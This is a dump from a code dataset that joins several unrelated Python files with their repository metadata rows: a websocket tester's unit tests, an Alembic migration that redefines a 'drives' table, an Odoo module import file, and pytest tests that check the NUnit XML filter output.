async def test_connect_with_rest_request_with_delay(self, mock_requests, mock_websockets, mock_sleep):
request = RestRequest('https://example.com', 'GET').with_delay(3.0)
ws_tester = WSTest('ws://example.com').with_request(request)
mock_request_response = MagicMock()
mock_request_response.status_code = 'OK'
mock_request_response.json.return_value = {'abc': 123}
mock_requests.return_value = mock_request_response
mock_socket = MagicMock()
mock_socket.close = MagicMock(return_value=asyncio.Future())
mock_socket.close.return_value.set_result(MagicMock())
mock_websockets.return_value = asyncio.Future()
mock_websockets.return_value.set_result(mock_socket)
mock_sleep.return_value = asyncio.Future()
mock_sleep.return_value.set_result(None)
await ws_tester.run()
mock_websockets.assert_called_once_with('ws://example.com')
mock_socket.close.assert_called_once()
mock_requests.assert_called_once_with('get', 'https://example.com', timeout=10.0)
mock_sleep.assert_called_once_with(3.0)
self.assertTrue(ws_tester.is_complete())
@patch('websockets.connect')
@patch('requests.request')
@syncify
async def test_connect_with_rest_request_with_timeout(self, mock_requests, mock_websockets):
request = RestRequest('https://example.com', 'GET')
ws_tester = WSTest('ws://example.com').with_request_timeout(0.1).with_request(request)
mock_requests.side_effect = ConnectTimeout('test error')
mock_socket = MagicMock()
mock_socket.close = MagicMock(return_value=asyncio.Future())
mock_socket.close.return_value.set_result(MagicMock())
mock_websockets.return_value = asyncio.Future()
mock_websockets.return_value.set_result(mock_socket)
self.assertEqual(ws_tester.request_timeout, 0.1)
with self.assertRaises(WSTimeoutError):
await ws_tester.run()
mock_socket.close.assert_called_once()
| 35.186667 | 119 | 0.663054 | 2,997 | 26,390 | 5.50684 | 0.05005 | 0.083616 | 0.059985 | 0.074164 | 0.900267 | 0.872273 | 0.853672 | 0.842523 | 0.831677 | 0.819195 | 0 | 0.005985 | 0.227586 | 26,390 | 749 | 120 | 35.233645 | 0.80367 | 0.002653 | 0 | 0.742958 | 0 | 0 | 0.077706 | 0.005206 | 0 | 0 | 0 | 0 | 0.142606 | 1 | 0.012324 | false | 0 | 0.010563 | 0 | 0.028169 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
d2974d7f29e54b05e1d0513f55f1ac1baa087f77 | 58 | py | Python | test/config/wsgi.py | jrroman/wsgi-hot-reload-daemon | 42bf9c03f9d55b649e0407841445e15375f87848 | [
"MIT"
] | 2 | 2020-06-12T18:23:39.000Z | 2020-08-25T19:46:28.000Z | test/config/wsgi.py | jrroman/wsgi-hot-reload-daemon | 42bf9c03f9d55b649e0407841445e15375f87848 | [
"MIT"
] | 1 | 2018-09-17T14:56:29.000Z | 2018-09-17T14:56:29.000Z | test/config/wsgi.py | jrroman/wsgi-hot-reload-daemon | 42bf9c03f9d55b649e0407841445e15375f87848 | [
"MIT"
] | null | null | null | import testing
def test_func():
return "hello world"
| 11.6 | 24 | 0.706897 | 8 | 58 | 5 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.206897 | 58 | 4 | 25 | 14.5 | 0.869565 | 0 | 0 | 0 | 0 | 0 | 0.189655 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | true | 0 | 0.333333 | 0.333333 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 1 | 1 | 0 | 0 | 7 |
d2bf40751457eb6bc3c59ae37c6498d4d4099386 | 88 | py | Python | addons14/storage_media/models/__init__.py | odoochain/addons_oca | 55d456d798aebe16e49b4a6070765f206a8885ca | [
"MIT"
] | 1 | 2021-06-10T14:59:13.000Z | 2021-06-10T14:59:13.000Z | addons14/storage_media/models/__init__.py | odoochain/addons_oca | 55d456d798aebe16e49b4a6070765f206a8885ca | [
"MIT"
] | null | null | null | addons14/storage_media/models/__init__.py | odoochain/addons_oca | 55d456d798aebe16e49b4a6070765f206a8885ca | [
"MIT"
] | 1 | 2021-04-09T09:44:44.000Z | 2021-04-09T09:44:44.000Z | from . import storage_file
from . import storage_media
from . import storage_media_type
| 22 | 32 | 0.829545 | 13 | 88 | 5.307692 | 0.461538 | 0.434783 | 0.73913 | 0.637681 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.136364 | 88 | 3 | 33 | 29.333333 | 0.907895 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
96072e88ce10504690b78dc86056bdf56bf98e3c | 9,926 | py | Python | api/migrations/versions/00382c81d58e_.py | antcasq/machinaris | 95741d0cd78fee9605d7b47dcd08fa4f31b31f38 | [
"Apache-2.0"
] | null | null | null | api/migrations/versions/00382c81d58e_.py | antcasq/machinaris | 95741d0cd78fee9605d7b47dcd08fa4f31b31f38 | [
"Apache-2.0"
] | null | null | null | api/migrations/versions/00382c81d58e_.py | antcasq/machinaris | 95741d0cd78fee9605d7b47dcd08fa4f31b31f38 | [
"Apache-2.0"
] | null | null | null | """empty message
Revision ID: 00382c81d58e
Revises: e5c6d9a6d9c3
Create Date: 2022-03-25 21:58:49.980357
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '00382c81d58e'
down_revision = 'e5c6d9a6d9c3'
branch_labels = None
depends_on = None
def upgrade(engine_name):
globals()["upgrade_%s" % engine_name]()
def downgrade(engine_name):
globals()["downgrade_%s" % engine_name]()
def upgrade_():
# ### commands auto generated by Alembic - please adjust! ###
pass
# ### end Alembic commands ###
def downgrade_():
# ### commands auto generated by Alembic - please adjust! ###
pass
# ### end Alembic commands ###
def upgrade_alerts():
# ### commands auto generated by Alembic - please adjust! ###
pass
# ### end Alembic commands ###
def downgrade_alerts():
# ### commands auto generated by Alembic - please adjust! ###
pass
# ### end Alembic commands ###
def upgrade_blockchains():
# ### commands auto generated by Alembic - please adjust! ###
pass
# ### end Alembic commands ###
def downgrade_blockchains():
# ### commands auto generated by Alembic - please adjust! ###
pass
# ### end Alembic commands ###
def upgrade_challenges():
# ### commands auto generated by Alembic - please adjust! ###
pass
# ### end Alembic commands ###
def downgrade_challenges():
# ### commands auto generated by Alembic - please adjust! ###
pass
# ### end Alembic commands ###
def upgrade_connections():
# ### commands auto generated by Alembic - please adjust! ###
pass
# ### end Alembic commands ###
def downgrade_connections():
# ### commands auto generated by Alembic - please adjust! ###
pass
# ### end Alembic commands ###
def upgrade_drives():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_table('drives')
op.create_table('drives',
sa.Column('device', sa.String(), nullable=False),
sa.Column('hostname', sa.String(length=255), nullable=False),
sa.Column('blockchain', sa.String(length=64), nullable=False),
sa.Column('model_family', sa.String(), nullable=True),
sa.Column('device_model', sa.String(), nullable=True),
sa.Column('serial_number', sa.String(), nullable=True),
sa.Column('status', sa.String(), nullable=True),
sa.Column('type', sa.String(), nullable=True),
sa.Column('comment', sa.String(), nullable=True),
sa.Column('temperature', sa.REAL(), nullable=True),
sa.Column('power_on_hours', sa.REAL(), nullable=True),
sa.Column('size_gibs', sa.REAL(), nullable=True),
sa.Column('capacity', sa.String(), nullable=True),
sa.Column('smart_info', sa.String(), nullable=True),
sa.Column('created_at', sa.DateTime(), server_default=sa.text('(CURRENT_TIMESTAMP)'), nullable=True),
sa.Column('updated_at', sa.DateTime(), nullable=True),
sa.PrimaryKeyConstraint('device', 'hostname')
)
# ### end Alembic commands ###
def downgrade_drives():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_table('drives')
op.create_table('drives',
sa.Column('serial_number', sa.String(), nullable=False),
sa.Column('hostname', sa.String(length=255), nullable=False),
sa.Column('blockchain', sa.String(length=64), nullable=False),
sa.Column('model_family', sa.String(), nullable=True),
sa.Column('device_model', sa.String(), nullable=True),
sa.Column('device', sa.String(), nullable=True),
sa.Column('status', sa.String(), nullable=True),
sa.Column('type', sa.String(), nullable=True),
sa.Column('comment', sa.String(), nullable=True),
sa.Column('temperature', sa.REAL(), nullable=True),
sa.Column('power_on_hours', sa.REAL(), nullable=True),
sa.Column('size_gibs', sa.REAL(), nullable=True),
sa.Column('capacity', sa.String(), nullable=True),
sa.Column('smart_info', sa.String(), nullable=True),
sa.Column('created_at', sa.DateTime(), server_default=sa.text('(CURRENT_TIMESTAMP)'), nullable=True),
sa.Column('updated_at', sa.DateTime(), nullable=True),
sa.PrimaryKeyConstraint('serial_number')
)
# ### end Alembic commands ###
def upgrade_farms():
# ### commands auto generated by Alembic - please adjust! ###
pass
# ### end Alembic commands ###
def downgrade_farms():
# ### commands auto generated by Alembic - please adjust! ###
pass
# ### end Alembic commands ###
def upgrade_keys():
# ### commands auto generated by Alembic - please adjust! ###
pass
# ### end Alembic commands ###
def downgrade_keys():
# ### commands auto generated by Alembic - please adjust! ###
pass
# ### end Alembic commands ###
def upgrade_partials():
# ### commands auto generated by Alembic - please adjust! ###
pass
# ### end Alembic commands ###
def downgrade_partials():
# ### commands auto generated by Alembic - please adjust! ###
pass
# ### end Alembic commands ###
def upgrade_plotnfts():
# ### commands auto generated by Alembic - please adjust! ###
pass
# ### end Alembic commands ###
def downgrade_plotnfts():
# ### commands auto generated by Alembic - please adjust! ###
pass
# ### end Alembic commands ###
def upgrade_plottings():
# ### commands auto generated by Alembic - please adjust! ###
pass
# ### end Alembic commands ###
def downgrade_plottings():
# ### commands auto generated by Alembic - please adjust! ###
pass
# ### end Alembic commands ###
def upgrade_plots():
# ### commands auto generated by Alembic - please adjust! ###
pass
# ### end Alembic commands ###
def downgrade_plots():
# ### commands auto generated by Alembic - please adjust! ###
pass
# ### end Alembic commands ###
def upgrade_pools():
# ### commands auto generated by Alembic - please adjust! ###
pass
# ### end Alembic commands ###
def downgrade_pools():
# ### commands auto generated by Alembic - please adjust! ###
pass
# ### end Alembic commands ###
def upgrade_wallets():
# ### commands auto generated by Alembic - please adjust! ###
pass
# ### end Alembic commands ###
def downgrade_wallets():
# ### commands auto generated by Alembic - please adjust! ###
pass
# ### end Alembic commands ###
def upgrade_workers():
# ### commands auto generated by Alembic - please adjust! ###
pass
# ### end Alembic commands ###
def downgrade_workers():
# ### commands auto generated by Alembic - please adjust! ###
pass
# ### end Alembic commands ###
def upgrade_stat_plot_count():
# ### commands auto generated by Alembic - please adjust! ###
pass
# ### end Alembic commands ###
def downgrade_stat_plot_count():
# ### commands auto generated by Alembic - please adjust! ###
pass
# ### end Alembic commands ###
def upgrade_stat_plots_size():
# ### commands auto generated by Alembic - please adjust! ###
pass
# ### end Alembic commands ###
def downgrade_stat_plots_size():
# ### commands auto generated by Alembic - please adjust! ###
pass
# ### end Alembic commands ###
def upgrade_stat_total_coins():
# ### commands auto generated by Alembic - please adjust! ###
pass
# ### end Alembic commands ###
def downgrade_stat_total_coins():
# ### commands auto generated by Alembic - please adjust! ###
pass
# ### end Alembic commands ###
def upgrade_stat_netspace_size():
# ### commands auto generated by Alembic - please adjust! ###
pass
# ### end Alembic commands ###
def downgrade_stat_netspace_size():
# ### commands auto generated by Alembic - please adjust! ###
pass
# ### end Alembic commands ###
def upgrade_stat_time_to_win():
# ### commands auto generated by Alembic - please adjust! ###
pass
# ### end Alembic commands ###
def downgrade_stat_time_to_win():
# ### commands auto generated by Alembic - please adjust! ###
pass
# ### end Alembic commands ###
def upgrade_stat_plots_total_used():
# ### commands auto generated by Alembic - please adjust! ###
pass
# ### end Alembic commands ###
def downgrade_stat_plots_total_used():
# ### commands auto generated by Alembic - please adjust! ###
pass
# ### end Alembic commands ###
def upgrade_stat_plots_disk_used():
# ### commands auto generated by Alembic - please adjust! ###
pass
# ### end Alembic commands ###
def downgrade_stat_plots_disk_used():
# ### commands auto generated by Alembic - please adjust! ###
pass
# ### end Alembic commands ###
def upgrade_stat_plots_disk_free():
# ### commands auto generated by Alembic - please adjust! ###
pass
# ### end Alembic commands ###
def downgrade_stat_plots_disk_free():
# ### commands auto generated by Alembic - please adjust! ###
pass
# ### end Alembic commands ###
def upgrade_stat_plotting_total_used():
# ### commands auto generated by Alembic - please adjust! ###
pass
# ### end Alembic commands ###
def downgrade_stat_plotting_total_used():
# ### commands auto generated by Alembic - please adjust! ###
pass
# ### end Alembic commands ###
def upgrade_stat_plotting_disk_used():
# ### commands auto generated by Alembic - please adjust! ###
pass
# ### end Alembic commands ###
def downgrade_stat_plotting_disk_used():
# ### commands auto generated by Alembic - please adjust! ###
pass
# ### end Alembic commands ###
def upgrade_stat_plotting_disk_free():
# ### commands auto generated by Alembic - please adjust! ###
pass
# ### end Alembic commands ###
def downgrade_stat_plotting_disk_free():
# ### commands auto generated by Alembic - please adjust! ###
pass
# ### end Alembic commands ###
| 26.189974 | 105 | 0.640036 | 1,126 | 9,926 | 5.512433 | 0.098579 | 0.076849 | 0.17593 | 0.192686 | 0.942484 | 0.93314 | 0.932173 | 0.92734 | 0.92734 | 0.92734 | 0 | 0.00766 | 0.21086 | 9,926 | 378 | 106 | 26.259259 | 0.784757 | 0.41759 | 0 | 0.539474 | 0 | 0 | 0.086258 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.355263 | false | 0.328947 | 0.013158 | 0 | 0.368421 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 9 |
960c128d9cb429c5316257b1a16cb821255a4f1f | 7,159 | py | Python | tests/integration/test_filters.py | dciborow/pytest-nunit | 1d76c08b807332f12f93d156f297d856aff71157 | [
"MIT"
] | 1 | 2022-03-22T15:02:31.000Z | 2022-03-22T15:02:31.000Z | tests/integration/test_filters.py | dciborow/pytest-nunit | 1d76c08b807332f12f93d156f297d856aff71157 | [
"MIT"
] | null | null | null | tests/integration/test_filters.py | dciborow/pytest-nunit | 1d76c08b807332f12f93d156f297d856aff71157 | [
"MIT"
] | null | null | null | """
Test adding properties to tests
"""
import xmlschema
import os
def test_keyword_filter(testdir, tmpdir):
    """A simple ``-k`` expression is recorded as a ``name`` filter element.

    Runs one passing test under ``-k basic`` and checks both the run/suite
    counters and the ``<filter>`` section of the generated NUnit XML.
    """
    testdir.makepyfile(
        """
        def test_basic(record_nunit_property):
            assert 1 == 1
        """
    )
    outfile = tmpdir.join("out.xml")
    outfile_pth = str(outfile)
    result = testdir.runpytest("-v", "--nunit-xml=" + outfile_pth, "-k basic")
    result.stdout.fnmatch_lines(["*test_basic PASSED*"])
    assert result.ret == 0
    # Fix: the original discarded the return value of os.path.exists, so a
    # missing report file would have gone unnoticed.
    assert os.path.exists(outfile_pth)
    # Parse the report via the bundled NUnit TestResult schema; "lax"
    # validation tolerates attributes the schema does not define.
    xs = xmlschema.XMLSchema(
        os.path.join(
            os.path.abspath(os.path.dirname(__file__)),
            "../../ext/nunit-src/TestResult.xsd",
        ),
        validation="lax",
    )
    out = xs.to_dict(outfile_pth)
    # Exactly one test ran and passed, at both the run and suite level.
    assert out["@total"] == 1, out
    assert out["@passed"] == 1, out
    assert out["@failed"] == 0, out
    assert out["@skipped"] == 0, out
    assert out["test-suite"]["@total"] == 1
    assert out["test-suite"]["@passed"] == 1
    assert out["test-suite"]["@failed"] == 0
    assert out["test-suite"]["@skipped"] == 0
    # The keyword expression is reported verbatim as a non-regex name filter.
    assert "filter" in out
    assert out["filter"]["name"][0]["$"] == "basic"
    assert out["filter"]["name"][0]["@re"] == 0
def test_keyword_filter_complex(testdir, tmpdir):
    """A quoted boolean ``-k`` expression is recorded verbatim in the filter.

    Same as ``test_keyword_filter`` but with an ``or`` expression; the whole
    quoted string should appear unmodified in the ``name`` filter element.
    """
    testdir.makepyfile(
        """
        def test_basic(record_nunit_property):
            assert 1 == 1
        """
    )
    outfile = tmpdir.join("out.xml")
    outfile_pth = str(outfile)
    result = testdir.runpytest("-v", "--nunit-xml=" + outfile_pth, '-k "test or basic"')
    result.stdout.fnmatch_lines(["*test_basic PASSED*"])
    assert result.ret == 0
    # Fix: the original discarded the return value of os.path.exists, so a
    # missing report file would have gone unnoticed.
    assert os.path.exists(outfile_pth)
    # Parse the report via the bundled NUnit TestResult schema; "lax"
    # validation tolerates attributes the schema does not define.
    xs = xmlschema.XMLSchema(
        os.path.join(
            os.path.abspath(os.path.dirname(__file__)),
            "../../ext/nunit-src/TestResult.xsd",
        ),
        validation="lax",
    )
    out = xs.to_dict(outfile_pth)
    # Exactly one test ran and passed, at both the run and suite level.
    assert out["@total"] == 1, out
    assert out["@passed"] == 1, out
    assert out["@failed"] == 0, out
    assert out["@skipped"] == 0, out
    assert out["test-suite"]["@total"] == 1
    assert out["test-suite"]["@passed"] == 1
    assert out["test-suite"]["@failed"] == 0
    assert out["test-suite"]["@skipped"] == 0
    # The quoted expression is reported verbatim (quotes included) as a
    # non-regex name filter.
    assert "filter" in out
    assert out["filter"]["name"][0]["$"] == '"test or basic"'
    assert out["filter"]["name"][0]["@re"] == 0
def test_marker_filter(testdir, tmpdir):
    """A simple ``-m`` marker filter is recorded as a ``namespace`` element.

    Runs one marked, passing test under ``-m foo`` and checks the run/suite
    counters and the ``<filter>`` section of the generated NUnit XML.
    """
    testdir.makepyfile(
        """
        import pytest

        @pytest.mark.foo
        def test_basic(record_nunit_property):
            assert 1 == 1
        """
    )
    outfile = tmpdir.join("out.xml")
    outfile_pth = str(outfile)
    result = testdir.runpytest("-v", "--nunit-xml=" + outfile_pth, "-m foo")
    result.stdout.fnmatch_lines(["*test_basic PASSED*"])
    assert result.ret == 0
    # Fix: the original discarded the return value of os.path.exists, so a
    # missing report file would have gone unnoticed.
    assert os.path.exists(outfile_pth)
    # Parse the report via the bundled NUnit TestResult schema; "lax"
    # validation tolerates attributes the schema does not define.
    xs = xmlschema.XMLSchema(
        os.path.join(
            os.path.abspath(os.path.dirname(__file__)),
            "../../ext/nunit-src/TestResult.xsd",
        ),
        validation="lax",
    )
    out = xs.to_dict(outfile_pth)
    # Exactly one test ran and passed, at both the run and suite level.
    assert out["@total"] == 1, out
    assert out["@passed"] == 1, out
    assert out["@failed"] == 0, out
    assert out["@skipped"] == 0, out
    assert out["test-suite"]["@total"] == 1
    assert out["test-suite"]["@passed"] == 1
    assert out["test-suite"]["@failed"] == 0
    assert out["test-suite"]["@skipped"] == 0
    # Marker expressions map onto the NUnit "namespace" filter element.
    assert "filter" in out
    assert out["filter"]["namespace"][0]["$"] == "foo"
    assert out["filter"]["namespace"][0]["@re"] == 0
def test_marker_filter_complex(testdir, tmpdir):
    """A quoted boolean ``-m`` expression is recorded verbatim in the filter.

    Same as ``test_marker_filter`` but with an ``or`` expression over two
    markers; the whole quoted string should appear unmodified in the
    ``namespace`` filter element.
    """
    testdir.makepyfile(
        """
        import pytest

        @pytest.mark.baz
        @pytest.mark.foo
        def test_basic(record_nunit_property):
            assert 1 == 1
        """
    )
    outfile = tmpdir.join("out.xml")
    outfile_pth = str(outfile)
    result = testdir.runpytest("-v", "--nunit-xml=" + outfile_pth, '-m "foo or baz"')
    result.stdout.fnmatch_lines(["*test_basic PASSED*"])
    assert result.ret == 0
    # Fix: the original discarded the return value of os.path.exists, so a
    # missing report file would have gone unnoticed.
    assert os.path.exists(outfile_pth)
    # Parse the report via the bundled NUnit TestResult schema; "lax"
    # validation tolerates attributes the schema does not define.
    xs = xmlschema.XMLSchema(
        os.path.join(
            os.path.abspath(os.path.dirname(__file__)),
            "../../ext/nunit-src/TestResult.xsd",
        ),
        validation="lax",
    )
    out = xs.to_dict(outfile_pth)
    # Exactly one test ran and passed, at both the run and suite level.
    assert out["@total"] == 1, out
    assert out["@passed"] == 1, out
    assert out["@failed"] == 0, out
    assert out["@skipped"] == 0, out
    assert out["test-suite"]["@total"] == 1
    assert out["test-suite"]["@passed"] == 1
    assert out["test-suite"]["@failed"] == 0
    assert out["test-suite"]["@skipped"] == 0
    # The quoted marker expression is reported verbatim (quotes included)
    # as a non-regex namespace filter.
    assert "filter" in out
    assert out["filter"]["namespace"][0]["$"] == '"foo or baz"'
    assert out["filter"]["namespace"][0]["@re"] == 0
def test_path_filter(testdir, tmpdir):
    """A positional file path argument is recorded as a ``test`` filter element.

    Runs one passing test by naming its file on the command line and checks
    the run/suite counters and the ``<filter>`` section of the NUnit XML.
    """
    testdir.makepyfile(
        """
        def test_basic(record_nunit_property):
            assert 1 == 1
        """
    )
    outfile = tmpdir.join("out.xml")
    outfile_pth = str(outfile)
    # testdir names the generated file after the running test function.
    result = testdir.runpytest(
        "-v", "--nunit-xml=" + outfile_pth, "test_path_filter.py"
    )
    result.stdout.fnmatch_lines(["*test_basic PASSED*"])
    assert result.ret == 0
    # Fix: the original discarded the return value of os.path.exists, so a
    # missing report file would have gone unnoticed.
    assert os.path.exists(outfile_pth)
    # Parse the report via the bundled NUnit TestResult schema; "lax"
    # validation tolerates attributes the schema does not define.
    xs = xmlschema.XMLSchema(
        os.path.join(
            os.path.abspath(os.path.dirname(__file__)),
            "../../ext/nunit-src/TestResult.xsd",
        ),
        validation="lax",
    )
    out = xs.to_dict(outfile_pth)
    # Exactly one test ran and passed, at both the run and suite level.
    assert out["@total"] == 1, out
    assert out["@passed"] == 1, out
    assert out["@failed"] == 0, out
    assert out["@skipped"] == 0, out
    assert out["test-suite"]["@total"] == 1
    assert out["test-suite"]["@passed"] == 1
    assert out["test-suite"]["@failed"] == 0
    assert out["test-suite"]["@skipped"] == 0
    # Path arguments map onto the NUnit "test" filter element.
    assert "filter" in out
    assert out["filter"]["test"][0]["$"] == "test_path_filter.py"
    assert out["filter"]["test"][0]["@re"] == 0
def test_path_filter_complex(testdir, tmpdir):
    """Multiple positional path arguments each become a ``test`` filter entry.

    Passes both the generated test file and ``"."`` on the command line and
    checks that the ``<filter>`` section records them in order.
    """
    testdir.makepyfile(
        """
        def test_basic(record_nunit_property):
            assert 1 == 1
        """
    )
    outfile = tmpdir.join("out.xml")
    outfile_pth = str(outfile)
    # testdir names the generated file after the running test function.
    result = testdir.runpytest(
        "-v", "--nunit-xml=" + outfile_pth, "test_path_filter_complex.py", "."
    )
    result.stdout.fnmatch_lines(["*test_basic PASSED*"])
    assert result.ret == 0
    # Fix: the original discarded the return value of os.path.exists, so a
    # missing report file would have gone unnoticed.
    assert os.path.exists(outfile_pth)
    # Parse the report via the bundled NUnit TestResult schema; "lax"
    # validation tolerates attributes the schema does not define.
    xs = xmlschema.XMLSchema(
        os.path.join(
            os.path.abspath(os.path.dirname(__file__)),
            "../../ext/nunit-src/TestResult.xsd",
        ),
        validation="lax",
    )
    out = xs.to_dict(outfile_pth)
    # The test is collected once even though both arguments match it.
    assert out["@total"] == 1, out
    assert out["@passed"] == 1, out
    assert out["@failed"] == 0, out
    assert out["@skipped"] == 0, out
    assert out["test-suite"]["@total"] == 1
    assert out["test-suite"]["@passed"] == 1
    assert out["test-suite"]["@failed"] == 0
    assert out["test-suite"]["@skipped"] == 0
    # Each path argument is recorded as its own non-regex "test" filter entry.
    assert "filter" in out
    assert out["filter"]["test"][0]["$"] == "test_path_filter_complex.py"
    assert out["filter"]["test"][0]["@re"] == 0
    assert out["filter"]["test"][1]["$"] == "."
    assert out["filter"]["test"][1]["@re"] == 0
| 30.206751 | 88 | 0.566839 | 891 | 7,159 | 4.432099 | 0.074074 | 0.141302 | 0.091162 | 0.109395 | 0.97493 | 0.961256 | 0.959483 | 0.949608 | 0.913143 | 0.895417 | 0 | 0.015963 | 0.23872 | 7,159 | 236 | 89 | 30.334746 | 0.708624 | 0.00433 | 0 | 0.795455 | 0 | 0 | 0.221401 | 0.039723 | 0 | 0 | 0 | 0 | 0.420455 | 1 | 0.034091 | false | 0.102273 | 0.011364 | 0 | 0.045455 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 9 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.